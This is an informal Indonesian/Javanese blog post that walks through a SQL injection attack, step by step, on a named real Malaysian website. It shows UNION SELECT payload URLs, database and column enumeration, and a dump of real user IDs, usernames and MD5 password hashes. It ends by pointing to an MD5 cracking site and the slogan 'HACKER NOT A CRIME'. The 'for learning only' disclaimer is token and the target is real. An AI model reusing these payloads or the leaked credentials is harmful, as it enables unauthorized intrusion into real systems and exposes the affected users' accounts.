Masih di sql injectttttttttt geto loh!!!! Cuma buat pembelajaran aja ya, jangan disalah gunakan lho, aku ra melu melu.
Praktekin ilmu kamu para hacker, cracker, ataupun ????.....
Target situs maligsial http://mcta.com.my/news2.php?ref=2&f=&id=131 Langkah sepisan: masukin karakter ' pada akhir alamat situs
Contone :http://mcta.com.my/news2.php?ref=2&f=&id=131'
Ternyata berbuah seperti ini : Warning: mysql_numrows(): supplied argument is not a valid MySQL result resource in /home/mcta.com.my/htdocs/news2.php on line 180 Langkah keloro: kita cari tahu posisi tablenya ahhh dengan tambahan ( order by 1)
Contone : http://mcta.com.my/news2.php?ref=2&f=&id=-131 order by 1--
nb : jgn lupa spasinya juga harus lengkap ya
Dan ternyata ??????? wah wah wah koq lum ada perkembangan ya???? pie to iki???
Yo sing sabar..... coba lagi ke order by 2--, by 3-- ampe dapet error deh ya...
Ehemmmmm ternyata berbuah pada hasil juga kalo sabar tuh... hihihi geli ya?!
Pada order by 8-- error bro and sis
Contone : http://mcta.com.my/news2.php?ref=2&f=&id=-131 order by 8--
Dan ahsilnya :Warning: mysql_numrows(): supplied argument is not a valid MySQL result resource in /home/mcta.com.my/htdocs/news2.php on line 180
wah jan mak nyus iki.... Langkah katelu :dioprek deh pake union untuk tahu posisi table +union+all+select+1,2,3,4,5,6,7
sampai tujuh karena terdapat error di posisi 8 jadi dikurangi 1
Contone : http://mcta.com.my/news2.php?ref=2&f=&id...,3,4,5,6,7
Hasile : 3
Posted On 5
Ayo ayo ayo..... kerjain yg nmr 5 ya.... Langkah ke papat: cari tau versinya deh yg pasti dgn menambahkan @@version atau ()
Contone :http://mcta.com.my/news2.php?ref=2&f=&id=-131+union+all+select+1,2,3,4,@@version,6,7
Hasile :Posted On 5.0.15-standard-log Langkah ke limo: tambahkan bumbu group_contact sebagai ganti angka 5 dan +from+information_schema.tables setelah angka 7
Contone : http://mcta.com.my/news2.php?ref=2&f=&id...ema.tables Hasile : Posted On CHARACTER_SETS,COLLATIONS,COLLATION_CHARACTER_SET_ APPLICABILITY,COLUMNS,COLUMN_PRIVILEGES,KEY_COLUMN _USAGE,ROUTINES,SCHEMATA,SCHEMA_PRIVILEGES,STATIST ICS,TABLES,TABLE_CONSTRAINTS,TABLE_PRIVILEGES,TRIG GERS,VIEWS,USER_PRIVILEGES,
countries,day,login_log,mcta_blog,mcta_blog_commen ts,mcta_cms,mcta_complain,mcta_contact,mcta_emag,m cta_job,mcta_job_category,mcta_links,mcta_member,m cta_member_category,mcta_member_forum,mcta_member_ forum_category,mcta_member_forum_comments,
mcta_news,mcta_private_cms,mcta_statistic,mcta_tp_ menu,month,pwd_reset,pwd_reset_log,state,xmb_membe rs,year Lha iyo iki bocahe...
Langkah ke enem: convert tulisan xmb_member ke hex (gunain situs dari mamang google)
Siiiiiiiip deh Langkah ke pitu : gunakan +from+information_schema.columns+where+table_name= (angka yg dah diconvert tadi) eitssss jgn lupa tambahin juga 0x pas sbelum angka hasil convert lho.
Dan hasile adalah :.............?
uid,username,password,registerDate,regdate,postnum ,email,site,aim,status,location,bio,sig,showemail, timeoffset,icq,avatar,yahoo,customstatus,theme,bda y,langfile,tpp,ppp
,newsletter,regip,timeformat,msn,dateformat,ban,me mber_id,lastvisit,mcta_member,resumeBank,nationali ty,residence,real_name,job_category,job_position,r esume_content,years_experience,academic,mobile,pub lish WOW yummeee....
Langah ke okeh: Kita tinggal gunain tuh uid, username, passwordnya ato apapun itu (gunakan kode 0x3a)
Contone : http://mcta.com.my/news2.php?ref=2&f=&id..._members--
Hasile bro and sis : 2712:chai123:827ccb0eea8a706c4c34a16891f84e7b,2718 :mctat192l:b0aec36730a06d7604794a93f48bbb9a,2719:m ctat048l:128fc002e4895389b8e1d878a764856c,2720:mct at174:fc186863e90ec3750a9e90201a33b3d0,2721:mctat0 78:d57cd9036b1c6d299ce888c1cd3ebcd3,
Posted On 3721:Stoneway Travel & Tours:401efdc3d6c03617b8d09c1e90ece7a6
Posted On 3722:KLCC:d00b0b1074aa0b1d9ff755d157486914
Posted On 3723:travex:7c02f1bde7b436470c54ae68edeb88e2
Posted On 3724:willblog:3b4ec6e4772c1eec0b7cb66d8f011fbe
Posted On 3725:TRAVEX TOURISM:7c02f1bde7b436470c54ae68edeb88e2
de el el deh
Wah wah jan mumet aq nonton angka banyak gitu... Tak jelasin skalian ya..... ehm ehm 2712 adalah uid
chai123 yo iku user name
827ccb0eea8a706c4c34a16891f84e7b adalah passwordnya
Langkah lebih selanjutnya: masuk ke http://www.md5decrypter.com/ (buat normalin passwordnya)
beres to??!
HACKER NOT A CRIME
MAJUKAN DUNIA IT INDONESIA
MAJUKAN DUNIA IT INDONESIA
0 Komentar